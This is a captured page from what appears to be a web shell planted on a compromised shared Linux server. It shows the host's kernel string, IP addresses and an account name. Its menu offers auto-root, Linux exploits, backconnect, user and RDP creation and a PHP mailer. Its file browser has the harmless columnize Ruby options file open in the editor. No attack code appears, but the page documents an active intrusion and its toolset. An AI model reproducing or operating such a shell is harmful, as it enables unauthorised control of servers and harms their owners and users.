Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
columnize /
[ HOME SHELL ]
Name
Size
Permission
Action
columnize.rb
5.9
KB
-rw-r--r--
opts.rb
1.23
KB
-rw-r--r--
version.rb
241
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : opts.rb
module Columnize computed_displaywidth = (ENV['COLUMNS'] || '80').to_i computed_displaywidth = 80 unless computed_displaywidth >= 10 # When an option is not specified for the below keys, these are the defaults. DEFAULT_OPTS = { :arrange_array => false, :arrange_vertical => true, :array_prefix => '', :array_suffix => '', :colfmt => nil, :colsep => ' ', :displaywidth => computed_displaywidth, :line_prefix => '', :line_suffix => '', :ljust => :auto, :term_adjust => false } # Options parsing routine for Columnize::columnize. In the preferred # newer style, +args+ is a hash where each key is one of the option names. # # In the older style positional arguments are used and the positions # are in the order: +displaywidth+, +colsep+, +arrange_vertical+, # +ljust+, and +line_prefix+. def self.parse_columnize_options(args) if 1 == args.size && args[0].kind_of?(Hash) # explicitly passed as a hash args[0] elsif !args.empty? # passed as ugly positional parameters. Hash[args.zip([:displaywidth, :colsep, :arrange_vertical, :ljust, :line_prefix]).map(&:reverse)] else {} end end end
Close